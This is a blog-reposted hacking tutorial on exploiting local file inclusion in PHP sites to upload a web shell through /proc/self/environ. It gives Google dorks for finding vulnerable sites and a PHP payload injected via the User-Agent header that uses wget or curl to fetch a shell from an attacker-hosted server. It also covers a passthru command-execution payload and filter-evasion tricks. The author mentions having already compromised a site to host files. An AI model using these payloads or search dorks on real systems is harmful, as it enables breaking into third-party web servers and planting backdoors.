Latest News

[TUT] LFI (Uploading Shell) [Pics/Video]



A vulnerable link looks something like this:
Code:
www.site.com/index.php?page=/etc/passwd

Here's what the code looks like that makes it vulnerable.
Code:
<?php
   $file = $_GET['file'];
   if(isset($file))
   {
  include("pages/$file");
   }
   else
   {
  include("index.php");
   }
   ?>

First off, you're going to need a few things.

1. FireFox
2. Tamper Data
3. Vulnerable Sites

If you can't find any good ones from those lists, use google dorks to find some.
Here's a few dorks.

Code:
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

I'm going to be showing you how to exploit LFI and get your shell uploaded via /proc/self/environ

So after you got your site, try checking if you can access /etc/passwd.

Your page should come up with something that looks like this.

Good, now we know that site is vulnerable.

Now we need to check for /proc/self/environ

So change your path to /proc/self/environ

Your page should look something like this if the file exists, not all sites have it.
http://i.imgur.com/23eiv.png
The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.

To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.


Now you should have a window that looks like this.
http://i.imgur.com/BjBY1.png
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.

We're going to try some code injection.

After you start tampering, you should see a window that looks something like this:
http://i.imgur.com/hulSq.png
In the User-Agent field, type:
Code:
<?php phpinfo();?>

Now when your site is down loading, you should get an image that looks something like this if you did it correctly.


Now we know we can execute code, so let's get our shell uploaded using wget.

Open TamperData again, click start tamper, and refresh your site. This time, on the User-Agent enter this:

Code:
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
It should look like this:



This downloads that text file, and renames it as a php file (your shell).

You can upload your shell as a text file using free webhosting...I already shelled a site, so I'm gonna use that site as file hosting.

Once you're done with that, you can try and access your shell directly by going to site/shell.php

If you get an error, try using the same method as when you got your vulnerable link.
Example:

Code:
http://www.site.com/index.php?page=/etc/passwd

Load your shell by using the same method.

Code:
http://www.site.com/index.php?page=shell.php

If it loads fine the second time, you can upload a file using your shell to directly access it.

When you're all done, you have a sexy shell, kinda like this :3

Alternate Methods
Sometimes sites will take extra precaution to prevent attacks like these.
Here is an alternate method.

Change your user agent to:

Code:
<? passthru($_GET['cmd']); ?>

Now load your url as:
Code:
/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php

So your url should look like:

Code:
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php

Now hopefully you got around it, and got your shell uploaded.
Special thanks to Hooded Robin for all the help he's given me with LFI.
I recommend you take a look at his video tutorial using Burp Suite.
You can check it out Here
Thanks alot <3

If you guys need anything, post here or feel free to PM me. I'll get back to you as soon as I can.

Filter Evasion

As you know, some sites have Web Application Firewalls, or WAFs installed. In order to bypass these, here's a few techniques you can try.

Null Bytes

Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.

Example:

Code:
http://www.site.com/index.php?page=/etc/passwd

It's pretty basic.

URL Encoding.

Here's another method, url encoding.

Encode your slashes, or unallowed characters to bypass these.

Code:
http://www.site.com/index.php?page=%2fetc%2fpasswd


2 comments:

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com , ,manoj960000@gmial.com.
skype: greeenchip

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code